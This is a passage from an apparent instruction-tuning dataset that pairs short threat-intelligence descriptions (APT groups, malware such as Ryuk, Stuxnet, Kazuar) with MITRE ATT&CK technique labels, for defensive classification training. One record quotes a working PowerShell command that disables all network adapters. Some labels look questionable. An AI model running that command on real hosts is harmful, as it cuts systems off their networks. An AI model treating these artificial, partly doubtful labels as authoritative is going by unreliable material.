"input": "TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windshift has used links embedded in e-mails to lure victims into executing malicious code.", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT37 has sent spearphishing attachments attempting to get a user to open them.", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windshift has used e-mail attachments to lure victims into executing malicious code.", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.", + "output": "- T1205.001: Traffic Signaling - Port Knocking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.", + "output": "- T1205.002: Traffic Signaling - Socket Filters" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fox Kitten has exploited known vulnerabilities in remote services including RDP.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 contains a module for exploiting SMB via EternalBlue.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.", + "output": "- T1213: Data from Information Repositories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.", + "output": "- T1213.001: Data from Information Repositories - Confluence" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.", + "output": "- T1213.002: Data from Information Repositories - Sharepoint" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "spwebmember is used to enumerate and dump information from Microsoft SharePoint.", + "output": "- T1213.002: Data from Information Repositories - Sharepoint" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has downloaded source code from code repositories.", + "output": "- T1213.003: Data from Information Repositories - Code Repositories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.", + "output": "- T1216.001: System Script Proxy Execution - PubPrn" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerLess can use a .NET browser information stealer module.", + "output": "- T1217: Browser Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth uses ActiveX objects for file execution and manipulation.", + "output": "- T1218.001: System Binary Proxy Execution - Compiled HTML File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole can register itself for execution and persistence via the Control Panel.", + "output": "- T1218.002: System Binary Proxy Execution - Control Panel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chaes has used Installutill to download content.", + "output": "- T1218.004: System Binary Proxy Execution - InstallUtil" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Javali has used the MSI installer to download and execute malicious payloads.", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.", + "output": "- T1218.009: System Binary Proxy Execution - Regsvcs/Regasm" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers.", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.", + "output": "- T1220: XSL Script Processing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.", + "output": "- T1221: Template Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.", + "output": "- T1221: Template Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.", + "output": "- T1221: Template Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line.", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.", + "output": "- T1480.001: Execution Guardrails - Environmental Keying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"UNC2452 used the \"\"Get-AcceptedDomain\"\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.\"", + "output": "- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Empire can use \"\"New-GPOImmediateTask\"\" to modify a GPO that will install and execute a malicious Scheduled Task/Job.\"", + "output": "- T1484.001: Domain or Tenant Policy Modification - Group Policy Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HermeticWiper has the ability to deploy through an infected system's default domain policy.", + "output": "- T1484.001: Domain or Tenant Policy Modification - Group Policy Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.", + "output": "- T1484.002: Domain or Tenant Policy Modification - Trust Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kazuar can overwrite files with random data before deleting them.", + "output": "- T1485: Data Destruction" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.", + "output": "- T1485: Data Destruction" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EKANS uses standard encryption library functions to encrypt files.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Industroyer\u2019s data wiper module writes zeros into the registry keys in \"\"SYSTEM\\CurrentControlSet\\Services\"\" to render a system inoperable.\"", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"\"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\"\" > NUL`.\"", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.", + "output": "- T1491.002: Defacement - External Defacement" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK 